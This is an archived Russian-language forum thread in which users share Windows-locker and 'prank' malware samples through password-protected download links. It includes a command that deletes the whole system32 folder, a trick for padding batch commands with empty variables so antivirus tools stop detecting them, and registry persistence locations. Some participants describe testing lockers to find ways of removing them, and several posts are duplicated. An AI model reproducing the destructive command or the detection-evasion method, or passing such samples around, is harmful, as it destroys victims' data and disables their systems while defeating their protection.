Цитата:
Убивает винду и грохает файлы на диске D
Неплохо, если учесть, что размер файла html 5 480 байт
» Windows заблокирован!
Цитата:
Неплохо, если учесть, что размер файла html 5 480 байт
Цитата:
KLASS
Ну как? поделитесь впечатлениями......а то тут все про пионерию сказки рассказывают..
- Вот для наглядности прикрепляю вскрытый Bootmeker2 http://i27.fastpic.ru/big/2012/0219/1c/f7e12f88f83408b6ed8cffe1d202461c.jpg
- Второй нужно вскрывать? Про батник я уже писал...а вот скрин reg файла...как вам нравится? http://i30.fastpic.ru/big/2012/0219/80/3c166d4a3de34cd2d9fe1eb377352780.jpg
- ..и все равно это не самое крутое...поверьте есть по
круче...когда комп...на помойку...Ну, как вирусы
Цитата:
круче...когда комп...на помойку...
Заинтриговали,поделитесь семплами?
Добавлено:
Прошелся и скачал с последних страниц все винлоки и натравил на них аваст-остался ток HL.rar
Имхо значит школата с вконтаГта не страшна
Цитата:
Второй нужно вскрывать?
Да не... RegShot ведь все изменения отлично отлавливает, что первого, что второго. Да и блокнот не отменяли.
Цитата:
круче...когда комп...на помойку...
Ну не томи уже...
Цитата:
все винлоки и натравил на них аваст-остался ток HL.rar
HL-содержит обычные системные команды, если его будут детектить антивири, то систему то же надо будет
В том и прелесть батника... он обычен. Добавлено:
Цитата:
Ну, как вирусы
Да то даже не вири, скорее подлянки... все делается задокументированными параметрами. Тот, который Bootmeker2.htm просто скрывает винт D: из проводника
KLASS
Цитата:
Они его уже детектят.
Цитата:
если его будут детектить антивири
Они его уже детектят.
Цитата:
Они его уже детектят
Ты имеешь ввиду exe'шник?
Да, и при том детект у 9 вендоров если с него снять навеску UPX, а если не снимать то поменьше.
kises
Убери в батнике фразу "title I will hack you!" и подсунь...
exe'шник
Батник с фразой
Батник без фразы
Добавлено:
Антивирям не нравится команда del /f /s /q %systemroot%\system32\*.*, если уберешь (или поменяешь, например, на del /f /q %systemroot%\system32\hal.dll) то уже не ругаются
Убери в батнике фразу "title I will hack you!" и подсунь...
exe'шник
Батник с фразой
Батник без фразы
Добавлено:
Антивирям не нравится команда del /f /s /q %systemroot%\system32\*.*, если уберешь (или поменяешь, например, на del /f /q %systemroot%\system32\hal.dll) то уже не ругаются
KLASS
Цитата:
Детект сбить есть много способов, но надолго ли.
Цитата:
Убери в батнике фразу
Детект сбить есть много способов, но надолго ли.
жалко файлов......
что вы с ними делаете...
что вы с ними делаете...Цитата:
Антивирям не нравится команда del /f /s /q %systemroot%\system32\*.*, если уберешь (или поменяешь, например, на del /f /q %systemroot%\system32\hal.dll) то уже не ругаются
Дак есть очень простой способ "мутации" командных файлов:
берем, например, строку
del /f /s /q %systemroot%\system32\*.*"
и разбавляем ее пустыми переменными, например получаем такой "мутант":
d%PRIVET%e%PRIVET%l /f /s%PRIVET% /q %systemroot%\system32\*.*
и абсолютно все антивирусы перестанут на нее ругаться (если до этого ругались),
хотя функционал строки абсолютно не изменился.
Цитата:
жалко файлов.
Да не жадничай... сИравно уже антивири их детектят, так хоть потренируемся. Где самый страшный и ужасный вирь, который кушает монитор и блок?
Цитата:
Да не жадничай... сИравно уже антивири их детектят, так хоть потренируемся. Где самый страшный и ужасный вирь, который кушает монитор и блок?
-.....да он вам и не страшен, раз такое дело.....файл bat...попробую его поискать..куда то у себя его спрятал..найду-выложу, а может и немного модернизирую....
Цитата:
и немного модернизирую
даю тему: после отработки батника систему в синьку... но сИравно отловим и заламаем
Есть еще один так скажем пионерский винлокер....но он немного особенный......вылезает через 30 мин после запуска...действия по блокировке стандартные....чуть позже выложу файл..пока сам его терзаю...
Добавлено:
- А пока протестируйте этот прикол о вреде курения http://zalil.ru/32746712
- ..но я не мог её запустить как не старался...
Добавлено:
- А пока протестируйте этот прикол о вреде курения http://zalil.ru/32746712
- ..но я не мог её запустить как не старался...
Цитата:
я не мог её запустить как не старался
аналогично, возможно работает в старых версиях... (c) 1999
- Ну что же выкладываю октябрятский винлокер...
- ..активируется через 30 мин каждого часа (если комп включен до 12 то в 12.30 если в 13 то в 13.30 и т.д.)
- ..после активации вылазит окно http://i29.fastpic.ru/big/2012/0221/78/371c826396cea070b8af695f7a258678.jpg
-...блокирует диспетчер....прописан в HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"\"svchosl.exe"
- ...сам файл http://zalil.ru/32752565 пароль 2012
ps...есть ваще простой способ его снятия...наподобие были недавно в сети...
- ..активируется через 30 мин каждого часа (если комп включен до 12 то в 12.30 если в 13 то в 13.30 и т.д.)
- ..после активации вылазит окно http://i29.fastpic.ru/big/2012/0221/78/371c826396cea070b8af695f7a258678.jpg
-...блокирует диспетчер....прописан в HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"\"svchosl.exe"
- ...сам файл http://zalil.ru/32752565 пароль 2012
ps...есть ваще простой способ его снятия...наподобие были недавно в сети...
Цитата:
после активации вылазит окно
Вот это я понимаю шутка... по человечески, даже денег не просят
- А эта весч.... мне понравилась особо....
- ..при скачивании каспер...орет http://i32.fastpic.ru/big/2012/0221/0c/2449c35d833fbd32f5f9eb501ed85d0c.jpg
-...заткнули каспера тряпочкой..скачали...запустили...остальное в картинках...
- http://i28.fastpic.ru/big/2012/0221/70/bb9b2e5faa5f090b187063d38e1c4870.jpg
- http://i28.fastpic.ru/big/2012/0221/03/9c921afa189b5c8291e376ef62d91103.jpg
- http://i32.fastpic.ru/big/2012/0221/71/f8ecf608d3942dabb9b656062281dd71.jpg
- http://i28.fastpic.ru/big/2012/0221/26/0c4a19fb148d4dfcc2c7eb2601a29a26.jpg
- http://i28.fastpic.ru/big/2012/0221/00/b60afa3e229690a52bd587d12aff4500.jpg
............
- Два вида этого клоуна: http://zalil.ru/32752971 и еще http://zalil.ru/32752982 пароли на оба 2012
-..развлекайтесь...
Добавлено:
Цитата:
Просьба протестируй этот..... http://zalil.ru/32753052 пароль прежний...я пока другим занят...как он действует не знаю....отпишись...
- ..при скачивании каспер...орет http://i32.fastpic.ru/big/2012/0221/0c/2449c35d833fbd32f5f9eb501ed85d0c.jpg
-...заткнули каспера тряпочкой..скачали...запустили...остальное в картинках...
- http://i28.fastpic.ru/big/2012/0221/70/bb9b2e5faa5f090b187063d38e1c4870.jpg
- http://i28.fastpic.ru/big/2012/0221/03/9c921afa189b5c8291e376ef62d91103.jpg
- http://i32.fastpic.ru/big/2012/0221/71/f8ecf608d3942dabb9b656062281dd71.jpg
- http://i28.fastpic.ru/big/2012/0221/26/0c4a19fb148d4dfcc2c7eb2601a29a26.jpg
- http://i28.fastpic.ru/big/2012/0221/00/b60afa3e229690a52bd587d12aff4500.jpg
............
- Два вида этого клоуна: http://zalil.ru/32752971 и еще http://zalil.ru/32752982 пароли на оба 2012
-..развлекайтесь...
Добавлено:
Цитата:
KLASS
Просьба протестируй этот..... http://zalil.ru/32753052 пароль прежний...я пока другим занят...как он действует не знаю....отпишись...
Цитата:
Ребят я думаю что в этой ветке умеснее обсуждать подопытных
- Просим прощения...я думал тут нагляднее будет....замечания приняты...
- Еще раз прошу прощения но там проверяют антивирусы......по моему та ветка для нас не подходит..мы как раз описываем проблемы с блокировкой винды...не так ли?
Цитата:
по моему та ветка для нас не подходит..мы как раз описываем проблемы с блокировкой винды...не так ли?
Там и вирусы у многих завсегдатаев руки ох как чешутся поковырять
Цитата:
Там и вирусы у многих завсегдатаев руки ох как чешутся поковырять
- Так там их ковыряние ограничивается проверкой вируса каким-нибудь антивирусником ( которые я терпеть не могу)....
- Я тестирую практически только винлоки, и на реальной машине ( не на виртуальной)...тестирование включает в себя запуск винлока и поиск решения проблемы...
- На той ветке я пролистал страниц 20 и нашел всего две рабочие ссылки на локер...один под паролем..пароль не известен.....
olzaruta
Цитата:
Пароль должен быть стандартным #
Цитата:
пароль не известен.....
Пароль должен быть стандартным #
olzaruta
Ну я ж не заставляю ити в ту ветку,просто как тут на это админы ответят
Ну я ж не заставляю ити в ту ветку,просто как тут на это админы ответят
Цитата:
Просьба протестируй этот.
Мельком глянул, пока не понял где он вылезет, но прописывает себя сюда HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\\AppInit_DLLs
+ файлик появился C:\Documents and Settings\All Users\Application Data\cf
sasherb
Мы как раз тут правим систему, для избавления от локеров, а не жамкаем антивири... В любом случае, думаю, модераторы поправят. Так что всем сорри, если далеко зашли...
Я разблокировал винду спомощью образа скачанного отсюда : http://www.antiwinlocker.ru/ , причем быстро получилось
Цитата:
.после активации вылазит окноА можно окно изменить как-нибудь, типа вы не проголосавали за Путина теперь вы заблокированы службой ФСБ, ""Купи слона" или что-то в этом роде
Ironcast
Конструктор вам в помощь
Конструктор вам в помощь
Страницы: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115
Предыдущая тема: "svchost.exe... память не может быть "read"&q
Форум Ru-Board.club — поднят 15-09-2016 числа. Цель - сохранить наследие старого Ru-Board, истории становления российского интернета. Сделано для людей.